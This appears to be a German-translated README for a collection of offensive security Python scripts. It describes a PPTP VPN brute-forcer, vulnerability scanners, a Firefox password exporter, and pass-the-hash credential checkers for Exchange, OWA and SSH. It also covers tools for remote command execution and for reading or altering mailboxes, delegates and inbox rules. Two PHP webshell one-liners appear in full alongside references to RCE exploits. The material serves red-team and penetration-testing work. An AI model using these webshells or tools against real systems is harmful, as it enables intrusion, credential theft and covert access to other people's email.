
Python-Codes meines Blogs.
Python-Codes meines Blogs.
Verwendet Brute-Force-Angriffe, um das Passwort des PPTP-VPN zu ermitteln.
Es liest die Passwörter aus einer Datei (namens wordlist) und verwendet dann pptpsetup, um eine Verbindung zum Server herzustellen.
Das Zeitintervall beträgt 10 Sekunden.
Wird verwendet, um Ports zu scannen.
Das Timeout beträgt 3 Sekunden.
c++-Version:
https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp
Wird verwendet, um die IP-Adresse aus einer URL abzurufen.
Ich kann das Ergebnis von Sublist3r direkt verwenden.
Wird verwendet, um doppelte IP-Adressen aus dem Ergebnis von Sublist3r zu entfernen.
Ich kann das Ergebnis von urltoip.py direkt verwenden.
Die IP-Adressen können mithilfe von Sublime sortiert werden (F9).
Wird verwendet, um doppelte Einträge aus einer Datei zu entfernen.
Referenz:
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
Wird verwendet, um die fofa-API aufzurufen und die IP-Adressen aus den Ergebnissen auszugeben.
Du kannst 100 Ergebnisse erhalten.
Wird verwendet, um die fofa-API aufzurufen und die IP-Adressen aus den Ergebnissen auszugeben.
Wenn du VIP bist, erhältst du 10000 Ergebnisse.
Referenz:
https://seclists.org/fulldisclosure/2019/Sep/31
Z. B.
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php
Referenz:
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w
Z. B.
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');
Wird verwendet, um die Passwörter von Firefox zu exportieren.
Wird verwendet, um die Version von Exchange abzurufen.
Zuerst wird die BuildNumber über den Quellcode der URL ermittelt und anschließend die Version abgerufen.
Referenz:
Wird verwendet, um die SMBv3-RCE-Schwachstelle zu scannen.
Das Timeout beträgt 3 Sekunden.
Referenz:
https://github.com/imjdl/CVE-2020-8515-PoC
CVE-2020-8515
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta und Vigor300B 1.3.3_Beta, 1.4.2.1_Beta und 1.4.4_Beta ermöglichen Remote-Codeausführung als root (ohne Authentifizierung) über Shell-Metazeichen im URI cgi-bin/mainfunction.cgi.
Betroffene Produkte:
Verwendet die Zimbra-SOAP-API, um eine Verbindung zum Zimbra-Mailserver herzustellen.
Verwendung:
Zimbra_SOAP_API.py <url> <username> <password> <mode>
Modus:
Z. B.:
Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low
Wird verwendet, um gültige Konten des Exchange Web Service zu überprüfen (unterstützt Klartext und NTLM-Hash)
Referenz: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
Verwendung:
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash
Z. B.
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1
Wird verwendet, um auf Autodiscover.xml zuzugreifen und die Benutzerkonfiguration abzurufen (unterstützt Klartext und NTLM-Hash)
Verwendung:
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx
Z. B.
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting
Erweiterter Modus von checkAutodiscover.py
Fügt einen <domain>-Parameter hinzu.
Wird verwendet, um auf Exchange Web Service zuzugreifen (unterstützt Klartext und NTLM-Hash)
Verwendung:
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname
Z. B.
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox
Wird verwendet, um gültige SSH-Anmeldedaten zu überprüfen (unterstützt Passwort und Private-Key-Datei)
Verwendung:
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile
Z. B.
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa
Remote-Befehlsausführung über SSH (unterstützt Passwort und Private-Key-Datei)
Verwendung:
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell
Z. B.
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps
Wird verwendet, um gültige Anmeldedaten von eas (Exchange Server ActiveSync) zu überprüfen
Verwendung:
easCheck.py <host> <user> <password>
Z. B.
easCheck.py 192.168.1.1 user1 password1
Wird verwendet, um gültige Exchange-Konten durch Verbinden mit OWA zu überprüfen.
Verwendung:
checkOWA.py <url> <user> <password>
Wird verwendet, um E-Mails durch Verbinden mit OWA zu lesen.
Verwendung:
owaManage.py <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment
Verwendet IMAP, um eine Verbindung zum Mailserver herzustellen.
Verwendung:
imapManage.py <IMAP server> <username> <password> <command>
<command>:
CheckConfig get the folder name
SaveAttachOfInbox save the attachments of Inbox
SaveAttachOfSent save the attachments of Sent
DownloadAllMailOfInbox download all the mails of Inbox
DownloadAllMailOfSent download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig
Wird verwendet, um die NTLM-Authentifizierung zu implementieren und mit execCmd.aspx zu kommunizieren.
Die Kommunikationsdaten werden mit Base64 kodiert.
Verwendung:
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami